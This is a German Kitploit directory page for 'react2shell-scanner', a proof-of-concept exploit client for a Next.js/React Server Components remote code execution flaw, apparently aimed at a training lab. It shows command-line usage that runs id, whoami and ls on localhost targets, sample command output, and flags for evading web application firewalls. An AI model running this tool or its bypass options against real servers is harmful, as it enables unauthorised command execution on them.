Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
react2shell-scanner — Präzisionsbasierte Erkennung von Remote-Code-Ausführungs-Schwachstellen in RSC/Next.js (CVE-2025-55182, CVE-2025-66478) | Kitploit
Tools/GitHubGitHub/hidden-investigations/react2shell-scanner
SchwachstellenscannerExploitationWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsLernen & Bildung
GitHubhidden-investigations/react2shell-scanner

react2shell-scanner

Präzisionsbasierte Erkennung von Remote-Code-Ausführungs-Schwachstellen in RSC/Next.js (CVE-2025-55182, CVE-2025-66478)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite
5vor 6 MonatenNoch nicht geprüft

React2Shell Scanner – mit PoC

CVE-2025-55182 – React Server Components RCE PoC
Bildungs-Exploit-Client für das Hidden Investigations React2Shell-Labor.

Dieses Repository enthält ein Single-Host Proof-of-Concept (PoC) Exploit-Tool für die React2Shell-Sicherheitslücke (CVE-2025-55182), die sich gegen fehlkonfigurierte React Server Components / Next.js-Anwendungen richtet.

Es ist dafür ausgelegt, nur gegen das offizielle Hidden Investigations React2Shell-Labor oder Systeme, die Sie ausdrücklich besitzen / verwalten, eingesetzt zu werden.


⚠️ Rechtlicher und ethischer Haftungsausschluss

Dieses Projekt wird ausschließlich zu Bildungs- und defensiven Sicherheitsforschungszwecken bereitgestellt:

  • Verwenden Sie dieses Tool nur auf:
    • Dem offiziellen Hidden Investigations React2Shell-Labor oder
    • Systemen, die Sie besitzen oder für die Sie explizite schriftliche Erlaubnis zum Testen haben.
  • Richten Sie es nicht auf zufällige Websites, Produktionssysteme oder Infrastruktur, die Sie nicht kontrollieren.
  • Die Autoren und Hidden Investigations übernehmen keine Verantwortung für Missbrauch oder Schäden.
  • Durch die Nutzung dieses Tools stimmen Sie zu, alle geltenden Gesetze und Vorschriften einzuhalten.

Funktionen

  • 🔥 React2Shell Exploit-Client für CVE-2025-55182
  • 🎯 Einzelhost-fokussiert (kein Massen-Scanning)
  • 📡 Unterstützung für benutzerdefinierte Pfade und Pfadlisten
  • 🧪 Safe-Check-Modus (keine OS-Befehle, nur ein Erkennungstest)
  • 🪟 Windows-freundlicher Modus (whoami als Standard)
  • 🛡️ WAF-Bypass-Helfer:
    • Junk-Multipart-Feld (--waf-bypass, --waf-bypass-size)
    • Vercel-Layout-Anpassung (--vercel-waf-bypass)
  • 🔐 TLS-Optionen (--insecure, benutzerdefinierte Header)
  • 🧾 JSON-Ausgabe (-o/--output, --all-results)
  • 🧘 Saubere Quiet-Mode-Ausgabe (perfekt zum Weiterleiten an andere Tools)

Voraussetzungen

  • Python: 3.8+ (getestet mit Python 3.10+)
  • Abhängigkeiten:
    • requests

Installieren Sie die Abhängigkeiten mit:

root@kitploit:~
pip install -r requirements.txt

Installation

  1. Klonen Sie das Hidden Investigations-Repository:
root@kitploit:~
git clone https://github.com/hidden-investigations/react2shell-poc.git
cd react2shell-poc
  1. (Optional, aber empfohlen) Erstellen Sie eine virtuelle Umgebung:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate   # Unter Windows: venv\Scripts\activate
  1. Installieren Sie die Anforderungen:
root@kitploit:~
pip install -r requirements.txt
  1. Führen Sie das Tool aus:
root@kitploit:~
python3 react2shell-scanner.py -h

Verwendung

Grundlegende Hilfe:

root@kitploit:~
python3 react2shell-scanner.py -h

Das Tool erfordert eine Ziel-URL:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000 -c "id"
# oder
python3 react2shell-scanner.py --url http://localhost:3000 -c "id"

Wenn Sie es ohne -t/--target oder -u/--url ausführen, gibt es eine gebrandete Hilfemeldung aus und beendet sich.


Befehlszeilenoptionen

Ziel und Pfade

Hinweis: Dieser PoC ist nur für Einzelhosts. Die Option -l/--list ist vorhanden, aber absichtlich deaktiviert.


Exploit / Payload-Verhalten


HTTP / TLS-Optionen


Ausgabe / UX-Optionen

Beispiel für den Quiet-Modus (schöne, mehrzeilige Ausgabe):

root@kitploit:~
python3 react2shell-scanner.py --url http://localhost:3000 -q -c "ls -la"

Ausgabe:

root@kitploit:~
total 12
drwxr-xr-x    1 root     root            10 Dec 13 21:13 .
drwxr-xr-x    1 root     root             0 Dec 13 21:13 ..
drwxr-xr-x    1 nextjs   nodejs          12 Dec 13 21:13 .next
drwxr-xr-x    1 nextjs   nodejs         396 Dec 13 21:13 node_modules
-rw-r--r--    1 nextjs   nodejs         733 Dec 13 21:13 package.json
drwxr-xr-x    1 root     root            12 Dec 13 19:13 public
-rw-r--r--    1 nextjs   nodejs        5661 Dec 13 21:13 server.js

Bulk-Scanning-Flags (absichtlich deaktiviert)

Die folgenden Flags existieren, um die CLI von Assetnote zu spiegeln, sind aber in diesem PoC nicht implementiert, um Missbrauch durch Massen-Scans zu vermeiden:

OptionStatus
-l, --listNicht implementiert
--threads NNicht implementiert

Wenn Sie -l/--list verwenden, gibt das Tool eine Warnung aus und beendet sich, und schlägt vor, den ursprünglichen react2shell-scanner von Assetnote für großflächiges sicheres Scannen zu verwenden.


Beispiele

Gegen lokales Labor ausführen:

root@kitploit:~
python3 react2shell-scanner.py --url http://localhost:3000 -c "whoami"

WAF-Bypass mit einem größeren Junk-Feld verwenden:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --waf-bypass --waf-bypass-size 256   -c "id"

Mehrere Pfade auf demselben Host:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path /   --path /_next/data   -c "id"

Pfade aus Datei:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path-file paths.txt   -c "id"

Safe-Check-Modus (keine OS-Befehle ausgeführt):

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000 --safe-check

JSON-Ausgabe der Ergebnisse in Datei:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path / --path /_next   -c "id"   -o results.json --all-results

JSON-Ausgabeformat

Wenn -o/--output verwendet wird, schreibt das Tool ein Array von Objekten wie:

root@kitploit:~
[
  {
    "url": "http://localhost:3000/",
    "path": "/",
    "success": true,
    "status": "success",
    "output": "uid=1000(nextjs) gid=1000(nodejs) groups=1000(nodejs)",
    "http": {
      "status_code": 302,
      "headers": {
        "X-Action-Redirect": "NEXT_REDIRECT;push;/login?a=uid%3D1000%28nextjs%29;307;",
        "...": "..."
      }
    }
  }
]

Danksagungen & Anerkennungen

  • Hidden Investigations – für die Veröffentlichung des React2Shell-Schulungslabors und des PoC-Clients.
  • @sakibulalikhan – Tool-Autor.
  • Assetnote – Inspiration für WAF-Bypass-Ideen durch ihren react2shell-scanner.

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert. Siehe LICENSE für Details.

📬 Kontaktieren Sie uns: [email protected]

Tool herunterladen
OptionBeschreibungStandard
-t, --targetZiel-URL oder Domain (erforderlich, es sei denn, --url wird verwendet)None
-u, --urlAlias für --target (Assetnote-ähnliches Flag)None
--pathZu testender Pfad (kann mehrfach verwendet werden, z. B. /, /_next)/
--path-fileDatei mit zu testenden Pfaden (eine pro Zeile)None
OptionBeschreibungStandard
-c, --commandAuf dem Ziel auszuführender Befehl (wenn der Exploit erfolgreich ist)id
--safe-checkEin SAFE_CHECK-Payload verwenden (kein OS-Befehl, nur eine Markierungszeichenfolge)aus
--windowsStandards für Windows-Ziele anpassen (z. B. whoami verwenden, wenn Befehl id ist)aus
--waf-bypassEin großes Junk-Multipart-Feld an den Anforderungstext anhängen, um WAF zu umgehenaus
--waf-bypass-size KBGröße des Junk-Felds in KB bei Verwendung von --waf-bypass128
--vercel-waf-bypassEin alternatives Multipart-Layout verwenden, das das Vercel-WAF-Verhalten beeinflussen soll (vereinfachter PoC)aus
OptionBeschreibungStandard
--timeout SECONDSZeitüberschreitung der Anforderung in Sekunden15 (oder 20 wenn --waf-bypass und kein Timeout gesetzt)
-k, --insecureSSL-Verifizierung deaktivieren (wie curl -k)aus
-H, --headerBenutzerdefinierter Header, z. B. -H "X-Forwarded-For: 127.0.0.1" (wiederholbar)None
OptionBeschreibungStandard
-o, --output FILEJSON-Ergebnisse in FILE schreibenNone
--all-resultsBei Verwendung von --output auch nicht verwundbare Ergebnisse einschließenaus
-v, --verboseAusführlicher Modus – HTTP-Status und X-Action-Redirect-Header anzeigenaus
-q, --quietQuiet-Modus – gibt bei Erfolg nur die normalisierte Befehlsausgabe ausaus
--no-colorFarbige Terminalausgabe deaktivierenaus